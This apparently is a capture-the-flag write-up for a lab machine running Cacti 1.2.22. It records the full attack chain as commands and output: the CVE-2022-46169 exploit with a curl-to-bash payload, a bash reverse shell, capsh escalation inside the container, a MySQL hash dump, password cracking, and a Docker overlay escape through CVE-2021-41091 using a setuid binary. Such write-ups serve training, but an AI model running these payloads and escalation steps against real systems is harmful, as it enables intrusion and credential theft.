Scannings

> TARGET=10.129.216.50 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Foothold: www-data

• Found Cacti Version 1.2.22
• Exploit: https://github.com/sAsPeCt488/CVE-2022-46169

> python CVE-2022-46169/CVE-2022-46169.py http://10.129.216.50 -c 'curl http://<ip>/shell.sh -o - |bash'

# shell.sh
bash -i >& /dev/tcp/<ip>/4444 0>&1

User: marcus

• Upload linpeas and note the following (this is useful for pe)

[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 31K Oct 14  2020 /sbin/capsh

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip

• Become root in the docker with: https://gtfobins.github.io/gtfobins/capsh/

> /sbin/capsh --gid=0 --uid=0 --

• Check /entrypoint.sh and found some mysql operations in the script.
• Get password hash from the db

> mysql --host=db --user=root --password=root cacti -e "select username,password from  user_auth;"

username        password
admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
guest   43e9a4ab75570f5b
marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

• marcus password can be cracked using john: funkymonkey
• Login via ssh and get the user flag

marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt
8561613fe8d13a68d553679aad930f15

PE: root

• Found mail to marcus

marcus@monitorstwo:~$ cat /var/mail/marcus 
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team

• Use the knowledge from previous linpeas run in the reverse shell session during foothold, in the container, we have the capability to assign capabilities to files

[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 31K Oct 14  2020 /sbin/capsh

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip

• Also, due to CVE-2021-41091, in the host system (i.e as user marcus), we can browse to the docker overlay of the container and execute a file with a malicioud permission set.
• To exploit this, we need two terminals: a reverse shell from the foothold steps and run as root, another terminal logged in as marcus via ssh.

# in reverse shell session
root@50bca5e748b0:/home# gcc pe.c
pe.c: In function 'main':
pe.c:5:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
    5 |     setuid(0);
      |     ^~~~~~

root@50bca5e748b0:/home# setcap cap_setuid+ep a.out

## the pe.c file is simple
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void main() {
    setuid(0);
    system("/usr/bin/bash");
}



# in ssh as marcus
marcus@monitorstwo:~$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/home/a.out
root@monitorstwo:~# cat /root/root.txt 
ad8e02bf86200743bacd8510331c5b1d